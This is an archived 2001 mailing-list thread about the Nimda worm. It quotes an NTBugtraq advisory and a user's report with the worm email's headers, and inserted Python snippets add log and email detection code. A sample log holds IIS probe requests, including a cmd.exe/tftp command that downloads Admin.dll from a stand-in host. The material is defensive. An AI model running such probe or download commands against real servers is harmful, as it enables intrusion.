Sounds like what I just now got notice of from Bugtraq
-----BEGIN PGP SIGNED MESSAGE-----
There have been numerous reports of IIS attacks being generated by
machines over a broad range of IP addresses. These "infected"
machines are using a wide variety of attacks which attempt to exploit
already known and patched vulnerabilities against IIS.
It appears that the attacks can come both from email and from the
network.
A new worm, being called w32.nimda.amm, is being sent around. The
attachment is called README.EXE and comes as a MIME-type of
"audio/x-wav" together with some html parts. There appears to be no
text in this message when it is displayed by Outlook when in
Auto-Preview mode (always a good indication there's something not
quite right with an email.)
The network attacks against IIS boxes are a wide variety of attacks.
Amongst them appear to be several attacks that assume the machine is
compromised by Code Red II (looking for ROOT.EXE in the /scripts and
/msadc directories, as well as an attempt to use the /c and /d virtual
roots to get to CMD.EXE). Further, it attempts to exploit numerous
other known IIS vulnerabilities.
One thing to note is the attempt to execute TFTP.EXE to download a
file called ADMIN.DLL from (presumably) some previously compromised
box.
Anyone who discovers a compromised machine (a machine with ADMIN.DLL
in the /scripts directory), please forward me a copy of that .dll
ASAP.
Also, look for TFTP traffic (UDP 69). As a safeguard, consider doing
the following:
edit %systemroot%\system32\drivers\etc\services.
change the line:
tftp 69/udp
to:
tftp 0/udp
thereby disabling the TFTP client. W2K has TFTP.EXE protected by
Windows File Protection so it can't be removed.
More information as it arises.
Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----
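The IIS probes the note above tells you to watch for (ROOT.EXE under /scripts and /msadc, the /c and /d virtual roots reaching CMD.EXE, TFTP.EXE fetching ADMIN.DLL) can be matched against web server logs. This is an added example, not code from either post: the rule names, the simplified W3C-style log layout and the sample log lines are constructed, and the cmd.exe path assumes the default \winnt system root.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Hypothetical rule names; the patterns follow the probes named in the post:
# ROOT.EXE under /scripts and /msadc (Code Red II backdoor), the /c and /d
# virtual roots used to reach cmd.exe (assumes the default \winnt path), and
# tftp.exe fetching ADMIN.DLL.
RULES = {
    "code-red-ii-backdoor": re.compile(r"^/(scripts|msadc)/root\.exe", re.I),
    "virtual-root-cmd": re.compile(r"^/(c|d)/winnt/system32/cmd\.exe", re.I),
    "tftp-admin-dll": re.compile(r"\btftp\b.*admin\.dll", re.I),
}

# Constructed sample log in a simplified W3C layout:
# date time client-ip method uri status
SAMPLE_LOG = """\
2001-09-18 10:01:02 192.0.2.10 GET /scripts/root.exe?/c+dir 404
2001-09-18 10:01:03 192.0.2.10 GET /MSADC/root.exe?/c+dir 404
2001-09-18 10:01:04 192.0.2.10 GET /c/winnt/system32/cmd.exe?/c+dir 404
2001-09-18 10:01:05 192.0.2.10 GET /d/winnt/system32/cmd.exe?/c+dir 404
2001-09-18 10:01:06 192.0.2.10 GET /scripts/root.exe?/c+tftp+-i+192.0.2.10+GET+Admin.dll 200
2001-09-18 10:02:00 198.51.100.7 GET /default.htm 200
"""


def classify_request(uri: str) -> List[str]:
    """Return the names of every rule the (decoded) request URI trips."""
    decoded = unquote(uri).replace("+", " ")
    return [name for name, rx in RULES.items() if rx.search(decoded)]


def scan_log(text: str) -> Dict[str, List[str]]:
    """Map each client IP that tripped at least one rule to its rule hits."""
    hits: Dict[str, List[str]] = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue  # skip blank or malformed lines
        client_ip, uri = fields[2], fields[4]
        for name in classify_request(uri):
            hits.setdefault(client_ip, []).append(name)
    return hits


if __name__ == "__main__":
    for ip, names in scan_log(SAMPLE_LOG).items():
        print(ip, sorted(set(names)))
```

A host that trips the tftp rule is the one to check for ADMIN.DLL in /scripts, as the note asks.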
-----Original Message-----
From: John Matteson [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 11:32 AM
To: Exchange Discussions
Subject: New Virus / Worm ??
I received an E-mail from a person that I didn't know this morning, and the
subject line was a lot of nonsense characters.
Using Outlook 2000 I highlighted it and it kicked off the attachment, which
opened Media Player and tried to play a file, but got a content error.
Here is the header from the message as it was received. Anyone have any
ideas about this?
===================
Received: from COURRIER (mail.stadacona.ca [207.236.164.198]) by
mx2.geac.com with SMTP (Microsoft Exchange Internet Mail Service Version
5.5.2653.13)
id T1K1YYZM; Tue, 18 Sep 2001 09:56:21 -0400
From: [EMAIL PROTECTED]
To:
Subject:
Xodco0411odco0804odco040alogv040abedsnotebeclassodco0804bedsnotebootodco0407
logv0409exgu040aodco0412avco040cbootmoderatravco0411unstdllodco040clogv0404o
dco040cbebsdulogv0412odco0407
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
John Matteson; Exchange Manager
Geac Corporate Infrastructure Systems and Standards
(404) 239 - 2981
...the words that I remember from my childhood still are true, that there
are none so blind as those who will not see....
--The Moody Blues (I know you're out there)
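The header dump above shows the structure Russ describes: an attachment declared as audio/x-wav but named readme.exe, next to an HTML part with no text. This added example (not code from either post) parses a message with that shape and flags both signs; the message body is constructed to mirror the posted headers, and the extension list is an assumption.

```python
from email import message_from_string
from email.message import Message
from typing import List

# Extensions treated as executable (assumption; the post only shows .exe).
EXECUTABLE_EXTS = (".exe", ".com", ".scr", ".pif")

# Constructed message mirroring the posted headers; the base64 body is a
# placeholder string, not a real attachment.
SAMPLE_MESSAGE = """\
From: sender@example.invalid
To: victim@example.invalid
Subject: Xodco0411odco0804
MIME-Version: 1.0
Content-Type: multipart/related; type="multipart/alternative";
  boundary="====_ABC1234567890DEF_===="
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav; name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

UExBQ0VIT0xERVI=
--====_ABC1234567890DEF_====--
"""


def suspicious_parts(msg: Message) -> List[str]:
    """Findings: an audio/* part carrying an executable file name, and an
    empty text/html part (why Outlook's Auto-Preview showed nothing)."""
    findings = []
    for part in msg.walk():
        ctype = part.get_content_type()
        name = str(part.get_param("name") or part.get_filename() or "")
        if ctype.startswith("audio/") and name.lower().endswith(EXECUTABLE_EXTS):
            findings.append(f"{ctype} part named {name!r} is an executable")
        if ctype == "text/html" and not part.get_payload(decode=True):
            findings.append("empty text/html part")
    return findings


def check_message(raw: str) -> List[str]:
    return suspicious_parts(message_from_string(raw))
```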
_________________________________________________________________
List posting FAQ: http://www.swinc.com/resource/exch_faq.htm
Archives: http://www.swynk.com/sitesearch/search.asp
To unsubscribe: mailto:[EMAIL PROTECTED]
Exchange List admin: [EMAIL PROTECTED]